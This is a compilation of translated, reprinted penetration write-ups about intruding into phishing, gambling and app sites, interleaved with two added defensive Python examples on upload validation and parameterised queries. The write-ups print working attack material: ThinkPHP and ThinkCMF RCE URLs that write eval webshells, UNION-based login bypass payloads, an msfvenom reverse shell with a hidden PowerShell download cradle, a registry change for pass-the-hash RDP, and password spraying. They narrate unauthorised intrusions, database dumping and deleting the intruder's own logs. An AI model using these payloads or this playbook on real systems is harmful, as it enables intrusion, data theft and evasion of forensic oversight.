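As an added example (not ThinkAdmin's code or anything from the post above), the following Python check applies the lesson of that post: an upload whitelist that only blocks the literal extension "php" still lets through php::$DATA on Windows, the alternative suffixes php3/php4/php5/php7/pht/phtml/phar on misconfigured Apache, and double extensions, and letting the client pick the stored name (the xkey parameter) is a separate mistake. The allow-list contents and helper names are my assumptions.

```python
"""Added example: hardened server-side handling of an uploaded filename.

Assumptions (not from ThinkAdmin): an image upload field with the
constructed allow-list below. The design points are that the allow-list
is applied to a *normalised* name and to *every* dotted segment, and that
the server, not the request, chooses the name written to disk.
"""
import posixpath
import secrets
from typing import FrozenSet, Optional

# Suffixes a PHP stack may execute: "php" plus the Apache-misconfiguration
# variants listed in the post. Rejected even if an administrator (or someone
# editing the storage_local_exts row directly) has put them on the whitelist.
EXECUTABLE_EXTS: FrozenSet[str] = frozenset(
    {"php", "php3", "php4", "php5", "php7", "pht", "phtml", "phar"}
)

# Constructed allow-list for an image field (assumption).
IMAGE_EXTS: FrozenSet[str] = frozenset({"jpg", "jpeg", "png", "gif", "webp"})


def normalize_filename(name: str) -> str:
    """Reduce a client-supplied filename to a lower-case base name.

    Handles the variants that slip past a bare "is the extension php?" test:
      - directory components with either separator ("..\\inc.php")
      - an NTFS alternate data stream suffix ("shell.php::$DATA"), which
        Windows maps back onto shell.php when the file is written
      - trailing dots and spaces, which Windows also strips on write
      - mixed case ("Shell.PhP")
    """
    name = name.replace("\\", "/")
    name = posixpath.basename(name)
    name = name.split(":", 1)[0]  # drop "::$DATA" or any other stream name
    name = name.rstrip(". ")
    return name.lower()


def is_allowed_upload(name: str, allowed: FrozenSet[str] = IMAGE_EXTS) -> bool:
    """True only if every dotted segment after the base name is on the
    allow-list and none of them is an executable suffix, so a double
    extension such as "shell.php.jpg" is rejected as well."""
    clean = normalize_filename(name)
    if not clean or "." not in clean:
        return False
    segments = clean.split(".")[1:]
    if any(seg in EXECUTABLE_EXTS for seg in segments):
        return False
    return all(seg in allowed for seg in segments)


def stored_name(original: str, allowed: FrozenSet[str] = IMAGE_EXTS) -> Optional[str]:
    """Server-chosen storage name: a random token plus the validated
    extension. Nothing from the request reaches the filesystem path."""
    if not is_allowed_upload(original, allowed):
        return None
    ext = normalize_filename(original).rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{ext}"
```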
  13. A senior was unfortunately cheated out of some funds on a phishing website a few days ago. Before contacting the relevant departments, he came to me to see whether I could obtain some useful information to facilitate the actions of the relevant departments.

After collecting preliminary information on the website, I found that it uses the ThinkPHP 5.0.7 framework, so I directly found the corresponding version of the ThinkPHP Exp and tried it:
http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=phpinfovars[0]=1 //Execute phpinfo
phpinfo popped up successfully, so the ThinkPHP RCE vulnerability had not been fixed. Through phpinfo it can be seen that the server was built with the pagoda panel and runs Windows. I thought the next step would be very simple, but I ran into difficulties when writing the shell:
http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=ye.phpvars[1][]=?php eval($_POST['cmd']);
The file was written successfully, but it was output directly to the page. Checking the source, I found that it had been escaped as HTML entities. After trying to base64-encode it and write it again, I found it was still escaped, so I directly executed a command and tried it:
http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir
I found there was no echo, and I tried to get a reverse shell but failed. At this point I felt that system might have been disabled, and I switched to eval and still failed. Finally, I found that it could be executed successfully using assert, so I directly constructed the shell connection:
http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@eval($_POST[ye])
After getting the shell, I tried to execute commands first, but commands still could not execute normally.
I tried to break through disable_functions but failed. At this point, change your thinking: check the ThinkPHP framework's server configuration file /application/database.php to get the MySQL database account. Connect to the database. Query the backend administrator data. But I found that the md5 could not be cracked; I roughly checked the data in the database. I didn't find any data of great help here, so I didn't consider continuing to work on the backend account. The main focus next should be on collecting information on the site administrator.

First check the log file /runtime/log/202107/05.log in the ThinkPHP framework. I found in the log that the system function was indeed disabled. At the same time, an important piece of data that was ignored when checking the database was found in the log: the last login IP of the backend administrator. Looking through the records from a few days earlier, I found that the last login IP was 101.78.*.*. I suspected that this was the IP address of the website administrator. After feeding it back to the senior, I checked the IP and found that it was an IP from Hong Kong. I felt a sinking feeling: this was probably a VPN. The result was as expected.

The following work was deadlocked. After flipping through ThinkPHP's log, no login data from other IPs was found. The backend administrator account password was modified in the database. After logging in to the backend, no useful information was found; there was only the management of some phishing articles. Later, I communicated with a master. The master suggested checking whether there was any useful information left in the pagoda panel. I found the data file of the pagoda panel in C:/BtSoft/panel/data/default.db and obtained the pagoda account information. At the same time, I also checked the log contents in the pagoda database. However, the password could not be cracked. At this point, you can reset the account password by overwriting the db file. However, this method requires restarting the panel.
Due to our current situation, this method was difficult to implement. So my thoughts fell into a deadlock again. After sleeping, I woke up the next day and remembered that there would be a request log for the pagoda panel. So I found a large amount of request information stored as json in C:/BtSoft/panel/logs/request/. Opening an earlier log file, there was indeed a breakthrough (it may be that the VPN was unstable and suddenly dropped during operation, resulting in leakage of the real IP). After querying 175.167.*.*, it was found to be an IP address in Shenyang, Liaoning; I used online tools to roughly locate it and fed it back to the senior. By the way, the website's source code, database, and log files were packaged and collected, and finally the request records we left during the infiltration were deleted. Finished work.

Reprinted from the original link: https://www.cnblogs.com/yesec/p/14983903.html
  14. 1. APP packet capture and reverse-engineering the encryption algorithm
Opening the APP shows a login box. After capturing the packet, the parameters were encrypted. Using Jadx to decompile the source code, it was found that there was no packing or obfuscation. Very lucky. Based on experience, first search for keywords such as Encrypt, Decrypt, etc.; it was found that there is an encryptData function in Common.js. Locating it, a set of encryption and decryption algorithms is written and placed there. Put it in the browser console to debug; it's true.

2. Find the injection point
First test the injection.
Plain text: {'userName':'TEST'','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext: (encrypted request body omitted)
Result: App returns exception
Plain text: {'userName':'TEST''','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext: (encrypted request body omitted)
Result: App returns normal
Plain text: {'userName':'TEST'or'1'='1','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext: (encrypted request body omitted)
Result: App returns normal

At this point, it can be judged that the login point is injectable, but the result is always "the username or password is wrong", which means ' or '1'='1 is of no use. Based on the returned result, the backend logic at the login point may be like this:
userInfo = 'select * from userinfo where username=userName';
userPass = userInfo.password;
if (userPass == password) { return 'Login success'; } else { return 'Login failed'; }
Constructing a universal password through union injection can make any user able to log in.
The test process is as follows. First test with order by, and learn that the number of fields is 9; construct the payload.
# Since the target server has filtering, here is a simple bypass
Plain text: {'userName':'TEST'union/**/select/**/null,null,null,null,null,null,null,null,null,null,null from dual-- ','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext: (encrypted request body omitted)
Result: App returns success
Since Oracle also requires matching field data types when doing a union query, the corresponding field data types must also be tested.
The final result is as follows.
# Note that I modified password to 123 here to test whether the universal password constructed by union is feasible
Plain text: {'userName':'TEST'union/**/select/**/1,'123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123',1 from dual-- ','passWord':'123','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext: (encrypted request body omitted)
Result: The prompt is "weak password" (indicating that this method is feasible)
Next, change the fields one by one to determine which field corresponds to the password field.
The test results are as follows.
# Note that I changed password to Ceshi123@@@; it is no longer a weak password
Plain text: {'userName':'TEST'union/**/select/**/1,'123','123','Ceshi123@@@','123','123','123','123','123','123',1 from dual-- ','passWord':'Ceshi123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext: (encrypted request body omitted)
Result: Prompt says login successful

After bypassing, I found that the program had an exception. Carefully observing the returned data, it includes username (username), staffId (employee number), email (email), staffName (name), tel (mobile number), and mobile (mobile number). However, this data was just constructed by myself. Here you need a real user's information for the subsequent login process. Fortunately, there is still a place to obtain real user information.

3. Enumerating usernames through "forgot password"
The app also has a forgot-password function (usually you can enumerate usernames here). You can use the forgot-password function to determine whether a username exists. Here I just ran the dictionary and many usernames came out.

4. Cracking the SMS verification code
Naturally, use these usernames to log in with the SMS verification code. Get the verification code, then decrypt the data packet, and the surprising discovery is that it returns the user's basic information. Retest the payload based on login, and the final result is as follows.
Plain text: {'userName':'TEST\'union/**/select/**/staffId,\'Qwe123@@@\',\'userName\',\'Qwe123@@@\',\'mobile\',\'mobile\',\'email\',\'865166023309431\',staffId from dual -- ','passWord':'Qwe123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}
Ciphertext:
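As an added example (not the app's code or anything from the post above), the login logic that post infers is reproduced in sqlite3 beside a parameterised version, so the mechanism and its fix can be run side by side. Everything here is constructed: the table, the one user row, and the UNION payload, whose password column is attacker-chosen exactly as in the post; the real backend was Oracle, but sqlite3 runs the same query shape without the "from dual".

```python
"""Added example: the injectable login pattern from the post, and its fix.

Constructed schema and data; nothing here is taken from the target app.
"""
import hmac
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory userinfo table with a single constructed user."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE userinfo (staffId INTEGER, userName TEXT, "
        "password TEXT, mobile TEXT)"
    )
    # Constructed row. The post's app evidently stored plaintext passwords,
    # since it could judge a supplied value as a "weak password".
    con.execute(
        "INSERT INTO userinfo VALUES (1001, 'alice', 'Correct-Horse-7', '139xxxx0000')"
    )
    return con


def login_vulnerable(con: sqlite3.Connection, user_name: str, password: str) -> bool:
    """What the post's pseudocode describes: build the SELECT by string
    concatenation, then compare the password column of whatever row comes
    back. A UNION payload makes that column attacker-supplied, so the
    comparison passes without knowing any real credential."""
    sql = f"SELECT * FROM userinfo WHERE userName='{user_name}'"
    row = con.execute(sql).fetchone()
    if row is None:
        return False
    return row[2] == password


def login_safe(con: sqlite3.Connection, user_name: str, password: str) -> bool:
    """Hardened: the user name is a bound parameter, so the whole payload is
    matched as one literal string and selects nothing; the comparison is
    constant-time. (A real system also stores a salted hash, not plaintext.)"""
    row = con.execute(
        "SELECT password FROM userinfo WHERE userName = ?", (user_name,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0].encode(), password.encode())


def probe(con: sqlite3.Connection, user_name: str) -> str:
    """Mirror of the post's first two probes against the vulnerable query:
    an unbalanced quote is a SQL syntax error ("exception"), a doubled
    quote is a valid literal ("normal"). That pair is the tell the post
    relied on, and it is the same pair a WAF or error-rate alert should
    flag on a login endpoint."""
    try:
        login_vulnerable(con, user_name, "x")
    except sqlite3.OperationalError:
        return "exception"
    return "normal"


# Constructed UNION payload in the post's shape: one synthetic row whose
# password column the attacker picks. Four columns because the constructed
# table has four; the post had to count them with ORDER BY first.
UNION_PAYLOAD = "TEST' union select 1,'attacker','Qwe123@@@','0'-- "

if __name__ == "__main__":
    db = make_db()
    print(probe(db, "TEST'"), probe(db, "TEST''"))         # exception normal
    print(login_vulnerable(db, UNION_PAYLOAD, "Qwe123@@@"))  # True
    print(login_safe(db, UNION_PAYLOAD, "Qwe123@@@"))        # False
```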
  15. 0x00 Introduction
Red vs. blue confrontation is undoubtedly a continuous game. With the continuous offense and defense of recent years, round after round has been fought, web vulnerabilities have decreased sharply, and social-engineering phishing has obviously become one of the mainstream attack methods.

0x01 Disclaimer
Please be sure to read carefully and fully understand the following terms:
1. Any articles shared by this official account are only for legally authorized enterprise security construction and personal learning. Any organization or individual is strictly prohibited from using them for illegal activities.
2. When testing with the relevant tools and technologies in this article, you should ensure that your behavior complies with local laws and regulations and that you have obtained sufficient authorization.
3. If you commit any illegal acts in the process of using the relevant tools and technologies in this article, you must bear the corresponding consequences yourself, and we will not bear any legal or joint liability.
4. It is strictly forbidden for any organization or individual to make illegal profits in the name of this official account.
5. All shared tools and technical articles in this official account are strictly prohibited from being publicly shared without authorization.
If the above prohibited behavior is discovered, we reserve the right to pursue legal responsibility, and you shall bear any consequences caused by the prohibited behavior.

0x02 Going through the regular operations
After getting the target -- asset collection -- find the soft persimmon -- try to cook it.
After obtaining the target unit's information, through Qichacha domain name and enterprise structure lookups, it was found that there was no foreign investment and only one superior parent company.
Looking for subdomains, there are no assets available (virustotal.com: fast and easy but inaccurate). It was also empty when checking the qaxnb asset mapping platform for any usable information. Through multi-point ping, domain name resolution and other operations, we find that they all point to Alibaba Cloud. After a full round of the process, there is no target to work on except for an unchanging official website (domain name resolution points to the cloud, and I wasn't in the mood to dig deeper). Finally came the conclusion: I actually am the soft persimmon.

0x03 All roads lead to Rome
If the web cannot be moved, the regular operations don't work. Start pointing the finger at the official account and mini program. By testing the mobile applications and observing the request addresses and the returned packet contents, the real IP address was finally found, so the official website was not on the cloud. Through the IP, a full port scan found H3C network management equipment. You can roughly guess that the IP is an egress IP. By scanning the full port information of the five IPs before and after it, I was overjoyed to find several application systems. They looked like soft persimmons, and I felt that success was right in front of me. I was about to strike at the soul and hit the yellow dragon. I was a little excited just thinking about it. Hehehehe.
As a result, although there were some holes, none of them could be moved, and getshell failed. Sure enough, the soft persimmon is me.
However, we are all the King of Guns who do offense and defense, and we will not give up until the last second. When we penetrated a certain system, we found a big baby (online manual one-to-one WeChat QR code).

0x04 I love target customer service
After adding the target customer service, my excited heart and trembling hands both implied that the two of us would be as beautiful as a first love. When we meet fire, something will happen tonight.
Hehehe. Through the time intervals of the conversation and the short replies, it is not difficult to see that she was perfunctory with me, in vain for my sincere heart. But as the saying goes, "the brave get fed and the timid starve." I concluded that she was not caring enough toward me, so I decided to be a brave man. Sure enough, under my sentence "Are you sure? Are you really treating me like this?", under the attack of two "?", she changed her mind and clicked on my big baby. I also successfully entered the intranet of their unit.

0x05 Details determine success or failure
By collecting process information and port information, it was discovered that Kingsoft Antivirus exists in the intranet, and on access it was found to be v9 (the upload has been fixed). The details are here. When I was testing the official account earlier, I found an account password and recorded it casually. After analyzing the pattern, I manually reassembled several account passwords and used them to try against Kingsoft Antivirus. Another shot at the soul hit, a precise blow, and successfully won. The ancients said: "If you have the internal network, those who hold centralized control win the world." At this point, although it is enough to make the unit's intranet fall, it is not perfect enough. I always feel that something is missing, so I have to keep rushing. Using the assembled password, I took the H3C network device mentioned above and found that I had directly become the network administrator, and I understood all the routing directions and network policies. Hehehehe.
The careful masters will have noticed that there is a vmware (the web title that appeals to a certain picture) in the intranet, so I definitely can't let her go, right? It was successfully obtained through historical vulnerabilities, and it was found that the core production system was deployed there, but the historical vulnerabilities had not been repaired.
getshell -- take data.mdb -- decrypt -- get cookies -- enter the backend
The rest is all fragmented stuff without much technical content. I believe the masters don't like it either, so let's stop here. It's impolite to keep hitting.

0x06 Attack Route

0x07 Last Words
If there is any unreasonable or incomprehensible content in the article, feel free to comment and let us communicate and make progress together. If there is illegal or infringing content in the article, feel free to point it out; it will be deleted immediately after verification.

Reprinted from the original link: https://mp.weixin.qq.com/s/cixtFPn__YPe1XtpcTE2Ow?scene=25#wechat_redirect
  16. 1. Cause There have been many cases of illegal spinach gambling in China in recent years. This time I will explain how I penetrated the next illegal spinach website. This infiltration was purely luck + the negligence of the webmaster, which can be said to be the destruction of a thousand-year-old embankment in the ant nest. In order to ensure readers' understanding, the intruder's identity is specially used to document it! 2. Scouting and collecting information Open the target site and found it was a spinach website, and then started collecting information. Whois information query of the domain name learned that the domain name comes from Western Digital Here I use the webmaster's ping tool to see if there is a CDN used and query the server room location. From whois results, I learned that DNS Pod is using DNS Pod, but those who have experienced it know that general large IDC manufacturers have their own DNS, so the agents use DNS Pod It is obvious that this domain name was registered on the agent. I originally prepared a social work domain name, but it was meaningless. Others still used the same thing after they came back after parsing it. F4ther wrote an article before saying that it was a honeypot and fishing to hijack the safety pulse. But it's too troublesome, just skip it and penetrate it directly. I saw that the URL is home/Change/AlipayInfo/alipay/WeChat.html. My first hunch is the program written using the ThinkPHP framework. In order to verify my guess, I specially entered the address to see if it reported an error. Generally, the version + physical path will be displayed when reporting an error to ThinkPHP. As a result, if you have a look at the point on the picture, you can get the following information 1. This site uses the ThinkPHP3.2.2 framework. 2. Physical Road Force C:\WWW\pcdd\pc 3. This website does not use CDN 4. This website server is overseas (Canada). 5. There must be loopholes in this website. 3. 
Start the battle I found a direct SQLmap test, and the result is as follows. It is protected and directly blocked by the wall, which makes it impossible to continue. Connect to a VPN Look again, if you can't find a way to protect it, directly access the ping IP 47.xx.xx.xx, and find a phpstudy probe In phpstudy, the default database password is root, so we start to try weak passwords I found out that he was a weak password. So I'm visiting 47.xx.xx.xx/phpmyadmin. Unfortunately, it was walled again, which means that this firewall is a bit of a waste. Change the node and log in directly. Later, use the SQL statement to export a sentence Trojan, log in and click SQL, and then execute the statement select '?php @eval($_POST[1])?' into outfile 'C:\/WWW\/pcdd\/pc\/log1.php'; The purpose of using double slashes here and one slash is inverted is to be afraid that it will not be able to parse the slashes directly, and then it will be blocked again because of executing the SQL statement. After that, I directly used the kitchen knife and changed the node. Because I executed the SQL statement, it must have been blocked, so I changed the node directly. Remember, at this time, you will be flipping the directory in the shell. The 100 nodes on the wall are not enough for you to flip. You can directly execute the statement to increase the authority, and then connect to the server. The webmaster here fixes the vulnerability, and the Trojan naturally no longer exists and cannot be reproduced. However, the webmaster did not delete my account. found that he uses Alibaba Cloud's rds database, and his password is quite complicated. IV. Summary 1. His website uses cloud database site database separation. First, it is safer, and second, it is better to process data, but because it neglects the weak password of the local environment database, it is invaded. 2. Details are really important, such as information collection. 
Many people stare at the target station for a long time without gaining anything. At that point you might as well take a look at its windows and back doors. This article directly accessed the IP and discovered the environment configuration and probe; only then could it come in so smoothly.
3. The basics are very important. For example, if you don't know the default password and default address of the phpstudy environment. What if the default password of phpstudy were something else? Or not knowing that the default permission is system.
4. Be careful when doing things and minimize the workload. For example, when executing a SQL statement, it is very likely that phpmyadmin will parse the path into C:WWW or something, so it is best to bring double slashes and backslashes every time you test; it has no effect anyway. For example, if you browse the directory you will definitely be walled, and at least a minute is wasted changing nodes. Friends who have done public tests know that public tests race against time. So in this case I escalated privileges directly because of the firewall.
5. Don't be lazy when building your own website. Make all permissions strict and minimize the risk of being hacked.

Reprinted from the original link: https://mp.weixin.qq.com/s/3y894HT1uBBGdifbIToQZQ
17. On a sunny night, I was happily scrolling on Twitter, and suddenly I found that the recommended follow below was a business card for some xxxx video. This, this, this, this... I am a serious person; I don't know why Twitter pushed these to me. This must be done: open the promotion link and download the app. This app gives a familiar smell as soon as it is opened; it seems very likely to be a TP second-hand development. Register a mobile phone number and use Fiddler to capture and modify the packets, but the content is actually quite eye-catching. I captured the packet, obtained the URL, and found that this was just ThinkCMF? I smiled lewdly and thought I wouldn't fail to take it off. There were so many front-end RCEs that even with a WAF I could do it in seconds. However, I was quickly slapped in the face by reality.

Execute POC:
payload1: /index.php?g=apim=Oautha=fetchcontent=phpfile_put_contents('pass.php','?php @eval($_POST[1]);')/php
payload2: /?a=fetch;templateFile=public/indexprefix=''content=phpfile_put_contents('pass.php','?php@eval($_POST[1]);')/php
payload3: ?a=displaytemplateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();%3E
and read any file: /?a=displaytemplateFile=data/runtime/Logs/Portal/YY_MM_DD.log

Finally, an m.php one-sentence Trojan file will be generated in the directory; of course it can also be written as other payloads. The operation is as fierce as a tiger, and then you look at the file and it's a 404. Is it cold? Don't worry; in addition, this app also has SQL injection:
injection point 1: /index.php?g=Appapim=Videovideoid=1
injection point 2: /index.php?g=Appapim=Autha=indexuid=128889token=b69cda34dff2fa978a94b5583e7f5c9a
The injection is also cool. It seems it wants me to take out the 0day? Forget it, let's bear it. After some research, the details will not be posted; a thousand words are omitted here. Say too much and it's all tears.
Finally, phpinfo was pulled out, with the payload for versions above 7.2: /?a=fetchcontent=?=phpinfo();exit();

Isn't this a step closer to the shell? Then I saw that disable_functions disables so many. I tried writing using the assert function here and thought it was done, but the result still returned 1; the @assert function does not work. Here you can try to read files with file_get_contents and read the database configuration file. When I continued to read the config.php file, I suddenly remembered that when I downloaded the app, it was hosted on Alibaba Cloud OSS. Logically its configuration file should have an Alibaba Cloud key and id, but reality is cruel after all: I didn't even see the letters aliyun. There is nothing to read in the configuration files, and the database and redis cannot be connected externally. So I planned to write a shell and browse carefully, and tried to use file_put_contents to read the file. It seems not possible. Is it a parameter problem? file_get_contents can read any file, or is the directory not writable? Trying to write to /tmp/1.txt also reported the same error. I thought PHP also has other functions to write files, so I flipped through w3school. Write 123 to i.txt, and the file is written successfully. Try writing a one-sentence PHP, and it prompts that the template does not exist. What should I do? I saw that the shell was within reach. Look carefully at the fwrite parameters: w+ is open for write and r+ is append. Do I want to write one character at a time? That's right, just write it one character at a time.

a=fetchcontent=%3C?=@$fp=fopen(%221.php%22,%27a+%27);%20fwrite($fp,%27%27);exit();

Finally getshell. Bypass command execution and reverse shell. Then pack up and dump the database:
mysqldump -h127.0.0.1 -uxxxx -p
18. Get the target site page. I prepared to give up before it even started. Then let's look at the points mall in the upper right corner. I clicked in with a heavy heart. I saw this page, slammed the door and went out to smoke for ten minutes [don't ask why I didn't do it before].

Start collecting information. Get this points store and put the domain name into fofa. After getting the real IP, I found the Baota backend login panel. Then use the domain name/IP to scan directories [with Yujian's super large dictionary] and look at the language column to check it. Not knowing the script language, append index.php [has pages], index.jsp [404], index.asp [404] directly to the domain name; OK, it's PHP. Get the background. If there are very few pages like this, try your luck finding features. Search in fofa: many pages show onethink, then search on Baidu. It is confirmed that this is the framework and it is developed based on ThinkPHP. [There is an idea here: when we use a TP framework vulnerability to attack and it is not successful, we can use the discovered CMS for code audit. Since we found the Baota login panel above, we can audit for arbitrary file read, read the Baota username and password, and use the scheduled task to getshell.]

Use the TP vulnerability scanning tool to obtain the POC. The debug error showed tp5.0.1, and searching for it I found the log path. I tried log inclusion but failed. Later, I found that its logs are cleared when they reach a certain size, and the phpinfo page occupies a certain number of KB. So I had to clear its logs through burp and then convert the URL encoding to ?phpphpinfo();// (see [Vulnerability Summary: File Inclusion]). When clicking send, the log file disappears immediately without being displayed in burp. At this point, look back at the initial POC. When the POC succeeds, there is debug information below.
So we focus on Raw: when execution succeeds, the following information is displayed. Extract the key features and search for them in Raw. So if phpphpinfo(); is included, these two features will be repeated. The operation just now is written to the log; capture the packet and convert the URL's %3C?php%20phpinfo();%3E into php phpinfo();. Please note that when the log reaches a certain size it is cleared and cannot contain our malicious code. When we write phpphpinfo(); and send it, we have to access the log to see whether ?phpphpinfo(); exists. I tried it three times here. Successfully including the feature is not a problem (successfully included). The remaining getshell is not described; it is too simple. As long as it is included and executed, getshell is not a problem.

Reprinted from the original link: https://mp.weixin.qq.com/s/vE5QQx0FI_0OWVQ-6Uc9xg
19. Preface

I like watching movies but I like it for free, so I often watch on some movie and television sites, and occasionally some lazy ads pop up. Recently, I haven't updated the official account much, so I just found an ad for lazy video to make a post. Since the scale is relatively large, I am serious about coding.

Simple summary
1. Lazy Video --- cites the playback source of external x stations
2. Choose X --- the backend is all messy introductions with photos from cities and Baidu, fake
3. Make an appointment --- spinach game, guides betting through inducement
Is this arousing? I am posting the backend data.

Practical combat experience

I found the background through domain name search, xx entertainment, and pulled a wave of source code. I found similar source code and build tutorials. The IP of the site leaked. General site demos come with a demo account/password, backend and various fingerprint features. Through the fingerprint and default account password of the demo site, I found a batch of sites of the same type. Basically, they use the color lazy video to guide playing spinach; the background lottery is preset, all scams. I hope to share this article with your color-lazy friends. In the early stage, I found the method of finding the source code to find the fingerprint of the demonstration site. There are also some sites where it is the normal penetration method. First, register an account and see the prompt that the user name can be customized, and directly put in the XSS code. It is a waste of effort, and the background is difficult to trigger.
The user display in the background is like this, and when the admin clicks on the user details it triggers. Also, it is basically fish-farming guidance: small withdrawals allowed, large amounts obstructed. Finally, from the statistics of this 3k-plus person small platform, I found the approximate location of the administrator.

Reprinted from the original link: https://mp.weixin.qq.com/s/IIyt-m1ul0UPXvocmwCfag
20. 0x00 Introduction

I was bored, found a spinach site online for a simple test, and took notes. Big guys, go easy. Please advise if there are any shortcomings.

0x01 Weak password

Visiting the website shows a login page. Without a verification code, bp is enabled directly. The weak password admin/123456 was blasted out successfully and directly enters the background.

0x02 Inject and get permission

I looked through many functional points, found the upload interface at one functional point, and tried to upload a file, but found that it could not be uploaded: a whitelist was added. Chose to give up and continue looking. Adding a single quote to the parameter of a certain http://url/GroupMember.aspx?gid= directly reports an error. Isn't this SQL injection? Just do it, directly SQLMAP. Found MSSQL with DBA permissions; directly --os-shell.

Online MSF

Ordinary permissions have been obtained; the next step is to bring MSF online to escalate privileges. msf generates a powershell script and places it in the website directory.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection xx.ps1
VPS enables listening. Use powershell to bring the session online:
powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))'
If you execute powershell through URL splicing and stacking, there will be a problem: the single quote closing problem. We can encode the powershell to bypass the single quote problem. Here is a good website: https://r0yanx.com/tools/java_exec_encode/

Elevation of rights

The session is online, and the next goal is to obtain system permissions. Fortunately, getsystem can get system permissions directly. If you need to escalate privileges, the Tudou (Potato) family is recommended; the success rate in actual combat is very high and there are many server versions affected.
Migrate the process to prevent the session from dropping.

Remote login to the server

I found that the server opened port 3389. Because it has system permissions and is a 2012 system, and the plaintext password is not captured on versions greater than 2008, I directly modified the administrator password. (It is not recommended to directly modify the administrator password in actual combat.)

Use hash to log in to the administrator account remotely

Because Win2012 cannot obtain the plaintext password, directly modifying the administrator password is a bit inappropriate. Try to log in to the machine remotely using the administrator NTLM hash. (It's not the same machine; it just provides an idea.) To log in to RDP using the hash, you need to enable 'Restricted Admin Mode':
REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //Open Restricted Admin mode
REG query 'HKLM\System\CurrentControlSet\Control\Lsa' | findstr 'DisableRestrictedAdmin' //Check whether it is enabled; 0x0 means it is enabled
Successfully used the hash for the remote administrator desktop.

0x03 Others

Early on, I found that port 1433 was open, so I looked for the database configuration file and logged in to the database. I looked through Fofa and found that there are quite a lot of assets, many of which have port 1433 open. I guess there will be websites deployed by the same person. I tried to use the obtained password to blast port 1433 of these assets, and successfully hit several databases, all with sa permissions. Finish.

Reprinted from the original link: https://mp.weixin.qq.com/s/kj55hbZMC9jF6xmbzXWu4w https://xz.aliyun.com/t/12501
21. 1. I accidentally found a spinach site and then tested it. The idea is as follows: since it is a spinach site, users will definitely register, otherwise how could they charge money? For a registration page that interacts strongly with users, the possible vulnerabilities are as follows:
SQL injection: if the account information entered by the user is used directly to write or query the database without filtering, there must be SQL injection.
XSS: the personal information entered in the input box will be displayed on the user's page; at the same time, the administrator must have permission to view users' personal information in the background, and there may be stored XSS here; even if it is reflected or DOM XSS, since such sites have customer service, you can find ways to trick them into clicking links to steal cookies or for other purposes.
Horizontal privilege escalation: when the user logs in, views certain pages after logging in, and captures packets, if there are id-like fields, you may see the information of other users and even administrators by changing the id number.
CSRF: modify the account information, such as the password; or modify the email address, and then modify the password through the email address.
Payment vulnerability: capture the packet and change the parameters, causing a 0 yuan payment.

2. Following this idea, regardless of anything else, go to the tool and try the registration page first; the result is as follows: 2 high-risk XSS were found.
(1) Let's look at the second one first: after changing the prompt parameter to the detection tool's payload, the page is as follows: your payload is actually displayed on the page without any filtering, so I'm very happy. Since the payload itself is inside JS, the script tag was not constructed at the beginning; instead a payload like '19736%0a',}%0aalert(666);%0a' was used directly.
The purpose of the payload is to expose alert(666) directly to the original script tag in the background, but it was not possible after many repeated tries. I could only adjust my thinking and reconstruct the script tag. This time it succeeded, as follows; this means that this XSS was not a false alarm. The other one is in the cookie: if the sessionid is changed, it can also appear directly in the HTML source of the page; similar to the first one above, you can construct a script to execute your own JS code. However, since you don't know the background source code, you cannot determine whether this is a stored XSS, and you cannot trick others into clicking through a constructed URL. I personally think it is not very meaningful, so I will not verify it further here. Since it is not possible to log in to the background, it is still uncertain whether the other XSS is stored; we will not continue to verify other XSS vulnerabilities at this stage.
(2) The login interface captures packets: the user name and password are actually transmitted in plain text, WTF. After letting it go, I captured a new packet and put it in the repeater to try: there is a field captcha in it, which is the verification code.
After deleting it, the server executes anyway, and it does not prompt that the verification code is wrong but that the user name or password is wrong, which saves a lot of trouble. First test with the correct account and find that the returned status is Y, everything normal. Then start trying various SQL injection payloads with single quotes, double quotes, brackets, ') or 1=1 -- qwe and other SQL injections, and the return is as follows: the string of native code on the right is: "Please enter 4-15 characters, and only English letters and numbers can be entered". It seems that the filtering is intentional: only letters and numbers can be entered and no special symbols, so there is a high probability that SQL injection does not exist here. (Some website front-end pages also state this, and it is actually checked on the back-end server side, not using JS on the front end, so changing the fields after capturing packets with burp does not work.)
